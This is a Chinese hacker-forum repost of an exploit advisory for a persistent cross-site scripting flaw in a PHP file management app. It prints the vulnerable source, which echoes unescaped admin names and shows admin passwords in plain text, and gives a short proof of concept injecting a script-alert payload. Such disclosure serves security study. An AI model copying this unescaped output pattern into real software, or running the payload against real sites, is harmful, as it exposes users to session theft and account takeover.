File Management System 1.1 - Persistent Cross-Site Scripting - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: File Management System 1.1 - Persistent Cross-Site Scripting
# Date: 2020-06-30
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage:  https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
# Software Link:  https://www.sourcecodester.com/download-code?nid=13333&title=File+Management+System+Very+Complete+Using+PHP%2FMySQLi+version+1.1
# Version: 0.1.0
# Tested on: Kali Linux

Source code(view_admin.php.php):
<?php
require_once("include/connection.php");
$query="SELECT * FROM admin_login";
$result=mysqli_query($conn,$query);
while($rs=mysqli_fetch_array($result)){
$id =  $rs['id'];
$fname=$rs['name'];
$admin=$rs['admin_user'];
$pass=$rs['admin_password'];
$status=$rs['admin_status'];
?>
<tr>
  <td width='10%'><?php echo $fname; ?></td>
  <td align='center'><?php echo $admin; ?></td>
  <td align='center' width="20%"><?php echo $pass; ?></td>
  <td align='center'><?php echo $status; ?></td>
  <td align='center'><a href="#modalRegisterFormsss?id=<?php echo 
$id;?>">
  <i class="fas fa-user-edit" data-toggle="modal" 
data-target="#modalRegisterFormsss"></i> </a> | <a 
href="delete_admin.php?id=<?php echo htmlentities($rs['id']); ?>"><i 
class='far fa-trash-alt'></i></a></td>
</tr>
<?php  } ?>

POC:

1. http://192.168.1.58/Private_Dashboard/view_admin.php

2. Add admin click button

3. We write payload in the name section (<script>alert(1);</script>)

4. And view admin click button

5. And our bad payload will be displayed

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

File Management System 1.1 - Persistent Cross-Site Scripting

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索